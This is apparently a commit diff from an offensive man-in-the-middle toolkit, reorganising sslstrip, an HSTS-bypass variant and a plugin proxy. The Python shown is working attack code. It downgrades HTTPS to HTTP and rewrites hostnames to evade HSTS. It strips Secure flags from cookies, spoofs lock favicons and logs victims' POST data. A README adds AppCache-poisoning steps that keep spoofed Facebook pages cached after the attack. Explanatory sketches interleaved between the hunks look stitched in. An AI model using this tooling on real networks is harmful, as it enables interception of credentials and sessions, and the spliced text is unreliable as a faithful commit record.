major dir tree overhaul

byt3bl33d3r 2014-12-07 22:20:27 +01:00
commit 12f610a0c3
36 changed files with 142 additions and 98 deletions

View file

@@ -33,7 +33,7 @@ from SSLServerConnection import SSLServerConnection
 from URLMonitor import URLMonitor
 from CookieCleaner import CookieCleaner
 from DnsCache import DnsCache
-from ProxyPlugins import ProxyPlugins
+from libs.sergioproxy.ProxyPlugins import ProxyPlugins
 class ClientRequest(Request):

View file

@@ -1,212 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnectionHSTS import ServerConnection
from SSLServerConnectionHSTS import SSLServerConnection
from URLMonitorHSTS import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from ProxyPlugins import ProxyPlugins
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we don't like, and then
respond with either favicon spoofing, session denial, or proxying through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

View file

@@ -1,47 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from sslstrip.URLMonitor import URLMonitor
class DummyResponseTamperer:
'''
DummyResponseTamperer is an example class for server response tampering.
'''
def __init__(self, config):
self.config = config
self.urlMonitor = URLMonitor.getInstance()
logging.log(logging.DEBUG, "Tampering enabled.")
def isEnabled(self):
return self.config["enabled"]
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
# headers manipulation - see http://twistedmatrix.com/documents/10.1.0/api/twisted.web.http_headers.Headers.html
# setting headers
#headers.setRawHeaders("X-aaa", ["aaa"])
# getting headers
#headers.getRawHeaders("Content-Type")
return data

View file

@@ -1,96 +0,0 @@
# Copyright (c) 2010-2011 Ben Schmidt
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import inspect
class ProxyPlugins:
'''
This class does some magic so that all we need to do in
ServerConnection is call self.plugins.hook(), and every plugin
that implements the calling function's name will be invoked
with the args that were passed to the original function.
(A short usage sketch follows this file.)
To do this, we are probably abusing the inspect module,
and if it turns out to be too slow it can be changed. For
now, it's nice because it makes for very little code needed
to tie us in.
Sadly, propagating changes back to the caller is not quite
as easy in all cases :-/ . Right now, changes to local function
vars still have to be set back in the caller. This only happens
in handleResponse, but is still annoying.
'''
_instance = None
def setPlugins(self,plugins):
'''Set the plugins in use'''
self.plist = []
#build a lookup list
#need to clean up in future
self.pmthds = {}
for p in plugins:
self.addPlugin(p)
def addPlugin(self,p):
'''Load a plugin'''
self.plist.append(p)
for mthd in p.implements:
try:
self.pmthds[mthd].append(getattr(p,mthd))
except KeyError:
self.pmthds[mthd] = [getattr(p,mthd)]
def removePlugin(self,p):
'''Unload a plugin'''
self.plist.remove(p)
for mthd in p.implements:
self.pmthds[mthd].remove(getattr(p,mthd))
def hook(self):
'''Magic to hook various function calls in sslstrip'''
#gets the function name and args of our caller
frame = sys._getframe(1)
fname = frame.f_code.co_name
keys,_,_,values = inspect.getargvalues(frame)
#assumes that no one calls del on an arg :-/
args = {}
for key in keys:
args[key] = values[key]
#prevent self conflict
args['request'] = args['self']
del args['self']
#calls any plugin that has this hook
try:
for f in self.pmthds[fname]:
a = f(**args)
if a != None: args = a
except KeyError:
pass
#pass our changes to the locals back down
return args
def getInstance():
if ProxyPlugins._instance == None:
ProxyPlugins._instance = ProxyPlugins()
return ProxyPlugins._instance
getInstance = staticmethod(getInstance)
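For reference, here is a minimal, self-contained usage sketch of the hook mechanism described in the docstring above. The DemoPlugin and Interceptor classes and the intercepted() method are hypothetical names used only for illustration, and the import path assumes the new libs/ layout introduced by this commit.

from libs.sergioproxy.ProxyPlugins import ProxyPlugins

class DemoPlugin:
    # the names listed in `implements` are the caller functions to hook
    implements = ["intercepted"]

    def intercepted(self, request, data):
        # receives the caller's locals; the caller's `self` arrives renamed to `request`
        return {'request': request, 'data': data.upper()}

class Interceptor:
    def intercepted(self, data):
        res = ProxyPlugins.getInstance().hook()   # dispatches to DemoPlugin.intercepted
        return res['data']

ProxyPlugins.getInstance().setPlugins([DemoPlugin()])
print(Interceptor().intercepted("hello"))          # prints "HELLO"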

View file

@@ -1,44 +0,0 @@
I've modified sslstrip to be able to tamper with server responses.
One prepared example of a tampering attack is the HTML5 AppCache poisoning attack, which places the
modified responses in the browser's long-lasting HTML5 AppCache so that the spoofing continues
even after the victim is no longer MITMed.
Example response tampering with HTML5 AppCachePoison:
1) python sslstrip.py -t app_cache_poison/config.ini
2) While under MITM, visit http://example.com to display the tampered content
3) Visit http://www.facebook.com in an AppCache-supporting browser (Chrome, Firefox, Opera, Safari).
In Firefox you have to agree to store offline content; Chrome does not display any confirmation.
4) Stop the MITM, restart the browser, go for coffee or a holiday
5) Visit http://www.facebook.com again - the spoofed content is still there!
As a bonus, once the HTTP version of Google Analytics is requested, its spoofed content will be cached for 10 years.
EASY LOCAL TESTING MITM (for Ubuntu systems):
# create sslstrip admin user
# forward local traffic
$ sudo ./testmitm.sh start `id -u sslstrip`
# run sslstrip to hijack traffic
$ chown -R sslstrip /path/to/sslstrip/
$ su sslstrip
$ python sslstrip.py -t app_cache_poison/config.ini -p
# stop
$ sudo ./testmitm.sh stop
More info:
http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
This functionality has been added by Krzysztof Kotowicz
<kkotowicz at gmail dot com>
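For context, a rough sketch of what a custom tamperer behind that config.ini could look like, mirroring the DummyResponseTamperer interface shown earlier in this commit. The class name and the manifest path below are hypothetical and are not the actual app_cache_poison implementation.

import logging
# import path follows the DummyResponseTamperer shown above
from sslstrip.URLMonitor import URLMonitor

class AppCachePoisonSketch:
    def __init__(self, config):
        self.config = config
        self.urlMonitor = URLMonitor.getInstance()

    def isEnabled(self):
        return self.config["enabled"]

    def tamper(self, url, data, headers, req_headers, ip):
        if not self.isEnabled():
            return data
        # Point the page at an attacker-served AppCache manifest so the browser
        # keeps serving the tampered copy even after the MITM ends.
        return data.replace("<html", '<html manifest="/poison.appcache"', 1)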

View file

@@ -1,13 +0,0 @@
Originally, sergio-proxy was a standalone implementation of a
transparent proxy using the Twisted networking framework
for Python. However, sslstrip uses almost *exactly* the
same interception method, so I decided to use sslstrip's
more mature libraries and try to provide a simple plugin
interface to grab the data.
The only file that has been modified from sslstrip is
ServerConnection.py, from which we can hook into certain
important points during the interception.
Copyright 2011, Ben Schmidt
Released under the GPLv3
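As a rough illustration of that plugin interface, a plugin hooking ServerConnection.handleResponse might look like the sketch below; ResponseLogger is a hypothetical name, not a plugin shipped in this repository.

class ResponseLogger:
    implements = ["handleResponse"]   # hook ServerConnection.handleResponse

    def handleResponse(self, request, data):
        # `request` is the calling ServerConnection; `data` is the decompressed
        # response body. Returning the modified locals propagates changes back.
        print("Got %d bytes for %s" % (len(data), request.uri))
        return {'request': request, 'data': data}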

View file

@@ -1,11 +0,0 @@
SSLStrip+
=========
This is a new version of [Moxie's SSLstrip](http://www.thoughtcrime.org/software/sslstrip/) with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
Like the original, this version changes HTTPS to HTTP, and it additionally rewrites hostnames in the HTML code to avoid HSTS. Check my slides from BlackHat ASIA 2014, [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES](http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014), for more information.
For this to work you also need a DNS server that reverses the changes made by the proxy; you can find one at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48
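For a concrete picture of the hostname rewriting this refers to, here is a rough sketch based on URLMonitor.addSecureLink later in this commit; the example hostnames are purely illustrative, and dns2proxy is what maps the fake names back to the real ones.

def tokenize_host(host):
    # "www." hosts gain an extra "w"; everything else gets a "web" prefix.
    # e.g. www.example.com -> wwww.example.com, login.example.com -> weblogin.example.com
    if host.startswith("www."):
        return "w" + host
    return "web" + host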

View file

@@ -1,62 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, ConfigParser
class ResponseTampererFactory:
'''
ResponseTampererFactory creates a response tamperer that modifies responses to clients based on the config file settings.
'''
_instance = None
_default_config = {"enabled": False, "tamper_class": "sslstrip.DummyResponseTamperer"}
def __init__(self):
pass
def createTamperer(configFile):
logging.log(logging.DEBUG, "Reading tamper config file: %s" % (configFile))
config = ResponseTampererFactory._default_config.copy()
if configFile:
config.update(ResponseTampererFactory.parseConfig(configFile))
if config['enabled']:
logging.log(logging.DEBUG, "Loading tamper class: %s" % (config["tamper_class"]))
m = __import__(config["tamper_class"], globals(), locals(), config["tamper_class"])
return getattr(m, m.__name__.replace(m.__package__ + ".", ''))(config)
def parseConfig(configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def getTampererInstance():
return ResponseTampererFactory._instance
def buildTamperer(configFile):
if ResponseTampererFactory._instance == None:
ResponseTampererFactory._instance = ResponseTampererFactory.createTamperer(configFile)
getTampererInstance = staticmethod(getTampererInstance)
buildTamperer = staticmethod(buildTamperer)
createTamperer = staticmethod(createTamperer)
parseConfig = staticmethod(parseConfig)

View file

@@ -1,121 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnectionHSTS import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@@ -20,9 +20,9 @@ import logging, re, string, random, zlib, gzip, StringIO, sys
 import plugins
 from twisted.web.http import HTTPClient
-from ResponseTampererFactory import ResponseTampererFactory
+from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory
 from URLMonitor import URLMonitor
-from ProxyPlugins import ProxyPlugins
+from libs.sergioproxy.ProxyPlugins import ProxyPlugins
 class ServerConnection(HTTPClient):

View file

@@ -1,214 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory
from URLMonitorHSTS import URLMonitor
from ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we don't like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@@ -1,29 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequestHSTS import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

View file

@@ -1,107 +0,0 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: dictionary mapping real host -> substituted host
real = {} # LEO: dictionary mapping substituted host -> real host
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
port = host[portIndex+1:]
host = host[0:portIndex]
if len(port) == 0:
port = 443
#LEO: Substitute the HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)